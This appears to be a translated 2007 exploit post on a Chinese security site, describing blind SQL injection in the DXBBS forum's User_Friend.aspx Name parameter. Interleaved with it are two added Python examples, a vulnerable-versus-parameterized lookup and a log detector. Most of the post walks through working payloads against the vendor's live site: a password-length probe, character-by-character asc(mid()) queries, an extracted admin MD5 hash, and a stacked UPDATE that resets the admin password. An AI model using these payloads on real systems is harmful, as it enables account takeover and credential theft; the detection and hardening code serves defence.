DXBBS vulnerability (affects 7.3 and all earlier versions) - bug warning - Black Bar Safety Net

2007-04-27T00:00:00
ID MYHACK58:62200715243
Type myhack58
Reporter Anonymous
Modified 2007-04-27T00:00:00

Description

The vulnerability is in User_Friend.aspx: the Name parameter is not strictly filtered, so a crafted name allows SQL injection. Not much to say; see for yourself.

http://www.dxbbs.cn/

This is the DXBBS official website, running version 7.3 with an Access database.

Request User_Friend.aspx (the full URL was filtered out of the original post) with the parameters a=Add&Name=admin add"

A typical case of insufficient filtering. Because the backend is Access and no tool handled this case, the only approach is to guess blindly.

The default administrator is admin, so we guess the admin password. The tool is the Veteran's injection browser, guessing each character by converting it with asc(). I downloaded a copy of the source code, so the database structure can be looked up:

User table: DXBBS_user; password field: user_pass

http://www.dxbbs.cn/User_F... (filtered out of the original post) =Add&Name=admin" {v} and "a"="a

Because a quote follows the injection point, the rest of the statement cannot be commented out, so the injected condition has to be constructed this way, with {v} standing for the varying part.
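To make the root cause concrete, here is an added example (not DXBBS code, which is ASP.NET; this uses Python with SQLite standing in for the Access database) showing the friend-name lookup as a string-concatenated query beside its parameterized and validated replacement. The table and column names follow the page; the stored hash values are constructed placeholders, the allow-list pattern is an assumed policy, and the probe string is the page's length test adapted to SQLite syntax.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the DXBBS Access database (SQLite in memory).
    The user_pass values are placeholder 16-character strings, not real hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE DXBBS_user (user_name TEXT, user_pass TEXT)")
    conn.executemany(
        "INSERT INTO DXBBS_user VALUES (?, ?)",
        [("admin", "0123456789abcdef"), ("alice", "fedcba9876543210")],
    )
    return conn


def friend_exists_vulnerable(conn, name):
    """The pattern the advisory describes: the Name value is spliced into the
    SQL text, so a quote inside it closes the string and the attacker-supplied
    condition decides whether "buddy already exists" or "data does not exist"
    comes back (a boolean oracle). SQLite uses single-quoted strings where
    Access uses double quotes; the mechanism is the same."""
    sql = "SELECT 1 FROM DXBBS_user WHERE user_name = '%s'" % name
    return conn.execute(sql).fetchone() is not None


def friend_exists_safe(conn, name):
    """Hardened lookup: the value travels as a bound parameter, separate from
    the statement text, so quotes or SQL keywords in it are just characters."""
    row = conn.execute(
        "SELECT 1 FROM DXBBS_user WHERE user_name = ?", (name,)
    ).fetchone()
    return row is not None


# Allow-list for user names (assumed policy for this example, not DXBBS's own).
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,20}")


def is_valid_username(name):
    """Positive validation in front of the database: anything that is not a
    plausible user name is rejected before any query runs."""
    return USERNAME_RE.fullmatch(name) is not None


def add_friend(conn, name):
    """Hardened handler for a=Add&Name=...: validate, then query with a bound
    parameter. Returns fixed messages so the response leaks nothing beyond
    whether a legitimate name exists."""
    if not is_valid_username(name):
        return "invalid name"
    return "buddy exists" if friend_exists_safe(conn, name) else "no such user"


# The advisory's length test, adapted to SQLite (len -> length, no TOP 1).
PROBE = "admin' and (select length(user_pass) from DXBBS_user)=16 and 'a'='a"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, probe =16:", friend_exists_vulnerable(db, PROBE))  # True
    print("vulnerable, probe =15:",
          friend_exists_vulnerable(db, PROBE.replace("=16", "=15")))  # False
    print("safe lookup with probe:", friend_exists_safe(db, PROBE))  # False
    print("handler with probe:", add_friend(db, PROBE))  # invalid name
```

The vulnerable function answers True or False depending on whether the injected condition holds, which is exactly the oracle the advisory reads from the "buddy already exists" and "data does not exist" messages. The parameterized version treats the whole probe as a user name and finds no such row, and the validation layer refuses it before a query is issued at all.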

First, determine the password length with and (select top 1 len(user_pass) from DXBBS_user)=16. Returns: "the buddy already exists", which means the password is indeed 16 characters long, MD5-encrypted.

Next, guess the characters. First character: and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name="admin")>=57 returns "the data does not exist", so the guess is wrong: the ASCII value of the first character is less than 57.

and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name="admin")>=55 is correct, so the ASCII value of the first character is greater than or equal to 55.

and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name="admin")>=56 returns an error, so the ASCII value of the first character is less than 56.

Since the value is greater than or equal to 55 and less than 56, it is 55; ASCII 55 is the character 7, so the first character of the password is 7.

To guess the second character, change and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name="admin")>=57 to and (select top 1 asc(mid(user_pass,2,1)) from dxbbs_user where user_name="admin")>=57

And so on for the remaining characters.
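As a defensive counterpart to the procedure above, here is an added detection example (not part of the advisory) that runs over constructed IIS-style log lines: it URL-decodes the query string, flags the Jet SQL functions these probes rely on (asc(mid(...)), len(), select top 1) as well as the stacked UPDATE variant, and groups requests that differ only in their numeric values to surface the character-by-character enumeration. The log field layout, client addresses, timestamps and the placeholder hash in the UPDATE line are all constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Signatures of the probes shown in the advisory, matched case-insensitively
# after URL-decoding so '%28', '+' and mixed case cannot hide them.
SIGNATURES = {
    "char-by-char probe": re.compile(r"asc\s*\(\s*mid\s*\(", re.I),
    "length probe": re.compile(r"\blen\s*\(", re.I),
    "subquery": re.compile(r"\bselect\s+top\s+\d+\b", re.I),
    "stacked update": re.compile(r";\s*update\s+\[?\w+\]?\s+set\b", re.I),
}


def _probe(pos, val):
    """Constructed query string replaying the advisory's per-character test."""
    return ("a=Add&Name=admin%22+and+(select+top+1+asc(mid(user_pass%2C" + str(pos)
            + "%2C1))+from+dxbbs_user+where+user_name%3D%22admin%22)%3E%3D" + str(val)
            + "+and+%22a%22%3D%22a")


# Constructed W3C-style lines: date time client-ip method uri-stem uri-query status.
SAMPLE_LOG = [
    "2007-04-27 10:00:01 10.0.0.5 GET /User_Friend.aspx a=Add&Name=alice 200",
    "2007-04-27 10:00:07 10.0.0.9 GET /User_Friend.aspx "
    "a=Add&Name=admin%22+and+(select+top+1+len(user_pass)+from+DXBBS_user)%3D16+and+%22a%22%3D%22a 200",
    "2007-04-27 10:00:12 10.0.0.9 GET /User_Friend.aspx " + _probe(1, 57) + " 200",
    "2007-04-27 10:00:15 10.0.0.9 GET /User_Friend.aspx " + _probe(1, 55) + " 200",
    "2007-04-27 10:00:18 10.0.0.9 GET /User_Friend.aspx " + _probe(1, 56) + " 200",
    "2007-04-27 10:00:21 10.0.0.9 GET /User_Friend.aspx " + _probe(2, 57) + " 200",
    "2007-04-27 10:05:00 10.0.0.9 GET /User_Friend.aspx "
    "a=Add&Name=x;Update+[Dxbbs_user]+set+user_pass%3D%220000000000000000%22+where+user_name%3D%22admin%22;-- 200",
]


def parse_line(line):
    """Split one log line into the fields the detector needs; None if malformed."""
    parts = line.split()
    if len(parts) < 7:
        return None
    _date, _time, ip, _method, stem, query, status = parts[:7]
    return {"ip": ip, "stem": stem, "query": unquote_plus(query), "status": status}


def classify(query):
    """Names of every signature that matches the decoded query string."""
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]


def normalize(query):
    """Collapse digit runs so probes differing only in the compared value
    (>=55, >=56, >=57) or character position (mid(...,1,1), mid(...,2,1))
    fold into one key; many hits on one key is the enumeration pattern."""
    return re.sub(r"\d+", "N", query.lower())


def analyze(lines, threshold=3):
    """Return (signature findings, enumeration groups) for a list of log lines.
    A finding is (ip, stem, [signature names]); an enumeration group is
    (ip, stem, count) for any normalized query seen at least `threshold` times."""
    findings = []
    probes = Counter()
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue
        hits = classify(rec["query"])
        if hits:
            findings.append((rec["ip"], rec["stem"], hits))
        probes[(rec["ip"], rec["stem"], normalize(rec["query"]))] += 1
    enumerations = [(ip, stem, n) for (ip, stem, _), n in probes.items() if n >= threshold]
    return findings, enumerations


if __name__ == "__main__":
    found, groups = analyze(SAMPLE_LOG)
    for ip, stem, hits in found:
        print(ip, stem, ", ".join(hits))
    for ip, stem, n in groups:
        print("enumeration:", ip, stem, n, "near-identical probes")
```

The signature list catches individual requests; the normalization step is what distinguishes a one-off test from the loop described on this page, where the same request is repeated with only the threshold and position changing, and it keeps working when the response codes are all 200, as they are here, because the oracle is in the page body rather than the status.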

After about 5 minutes this gives the administrator password: 74e92e9ececa0ae7

This is the MD5 hash; as for how to recover the plaintext, don't ask me, that depends on your luck.

The following is the method for the SQL Server version: User_Friend.aspx (URL filtered in the original post) a=Add&Name=big Cicada;Update [Dxbbs_user] set user_pass="7a57a5a743894a0e" where user_name="admin";--